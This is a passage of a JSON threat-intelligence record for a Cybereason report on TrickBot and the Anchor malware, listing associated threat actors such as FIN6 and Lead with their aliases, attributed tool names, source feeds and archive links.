https://www.cybereason.com/blog/dropping-anchor-from-a-trickbot-infection-to-the-discovery-of-the-anchor-malware\r\nhttps://www.cybereason.com/blog/dropping-anchor-from-a-trickbot-infection-to-the-discovery-of-the-anchor-malware\r\nPage 22 of 22", "extraction_quality": 1, "language": "EN", "sources": [ "Malpedia", "MISPGALAXY", "ETDA", "MITRE" ], "references": [ "https://www.cybereason.com/blog/dropping-anchor-from-a-trickbot-infection-to-the-discovery-of-the-anchor-malware" ], "report_names": [ "dropping-anchor-from-a-trickbot-infection-to-the-discovery-of-the-anchor-malware" ], "threat_actors": [ { "id": "d90307b6-14a9-4d0b-9156-89e453d6eb13", "created_at": "2022-10-25T16:07:23.773944Z", "updated_at": "2026-04-10T02:00:04.746188Z", "deleted_at": null, "main_name": "Lead", "aliases": [ "Casper", "TG-3279" ], "source_name": "ETDA:Lead", "tools": [ "Agentemis", "BleDoor", "Cobalt Strike", "CobaltStrike", "RbDoor", "RibDoor", "Winnti", "cobeacon" ], "source_id": "ETDA", "reports": null }, { "id": "12517c87-040a-4627-a3df-86ca95e5c13f", "created_at": "2022-10-25T16:07:23.61665Z", "updated_at": "2026-04-10T02:00:04.689Z", "deleted_at": null, "main_name": "FIN6", "aliases": [ "ATK 88", "Camouflage Tempest", "FIN6", "G0037", "Gold Franklin", "ITG08", "Skeleton Spider", "Storm-0538", "TAAL", "TAG-CR2", "White Giant" ], "source_name": "ETDA:FIN6", "tools": [ "AbaddonPOS", "Agentemis", "AmmyyRAT", "Anchor_DNS", "BlackPOS", "CmdSQL", "Cobalt Strike", "CobaltStrike", "FlawedAmmyy", "FrameworkPOS", "Grateful POS", "JSPSPY", "Kaptoxa", "LOLBAS", "LOLBins", "Living off the Land", "LockerGoga", "MMon", "Magecart", "Meterpreter", "Mimikatz", "More_eggs", "NeverQuest", "POSWDS", "Reedum", "Ryuk", "SCRAPMINT", "SONE", "SpicyOmelette", "StealerOne", "Taurus Loader Stealer Module", "Terra Loader", "TerraStealer", "Vawtrak", "WCE", "Windows Credential Editor", "Windows Credentials Editor", "cobeacon", "grabnew" ], "source_id": "ETDA", "reports": null }, { "id": "ea7bfe06-7c23-481d-b8ba-eafa6cda3bc9", "created_at": "2022-10-25T15:50:23.317961Z", "updated_at": "2026-04-10T02:00:05.280403Z", "deleted_at": null, "main_name": "FIN6", "aliases": [ "FIN6", "Magecart Group 6", "ITG08", "Skeleton Spider", "TAAL", "Camouflage Tempest" ], "source_name": "MITRE:FIN6", "tools": [ "FlawedAmmyy", "GrimAgent", "FrameworkPOS", "More_eggs", "Cobalt Strike", "Windows Credential Editor", "AdFind", "PsExec", "LockerGoga", "Ryuk", "Mimikatz" ], "source_id": "MITRE", "reports": null }, { "id": "b3acfb48-b04d-4d3d-88a8-836d7376fa2e", "created_at": "2024-06-19T02:03:08.052814Z", "updated_at": "2026-04-10T02:00:03.659971Z", "deleted_at": null, "main_name": "GOLD FRANKLIN", "aliases": [ "FIN6 ", "ITG08 ", "MageCart Group 6 ", "Skeleton Spider ", "Storm-0538 ", "White Giant " ], "source_name": "Secureworks:GOLD FRANKLIN", "tools": [ "FrameWorkPOS", "Metasploit", "Meterpreter", "Mimikatz", "PowerSploit", "PowerUpSQL", "RemCom" ], "source_id": "Secureworks", "reports": null }, { "id": "ee3363a4-e807-4f95-97d8-b603c31b9de1", "created_at": "2023-01-06T13:46:38.485884Z", "updated_at": "2026-04-10T02:00:02.99385Z", "deleted_at": null, "main_name": "FIN6", "aliases": [ "SKELETON SPIDER", "ITG08", "MageCart Group 6", "ATK88", "TA4557", "Storm-0538", "White Giant", "GOLD FRANKLIN", "G0037", "Camouflage Tempest" ], "source_name": "MISPGALAXY:FIN6", "tools": [], "source_id": "MISPGALAXY", "reports": null } ], "ts_created_at": 1775434597, "ts_updated_at": 1775792033, "ts_creation_date": 0, "ts_modification_date": 0, "files": { "pdf": "https://archive.orkl.eu/a2da9ba5a5a893a9823c509fb180b1f98e65b4e2.pdf", "text": "https://archive.orkl.eu/a2da9ba5a5a893a9823c509fb180b1f98e65b4e2.txt", "img": "https://archive.orkl.eu/a2da9ba5a5a893a9823c509fb180b1f98e65b4e2.jpg" } }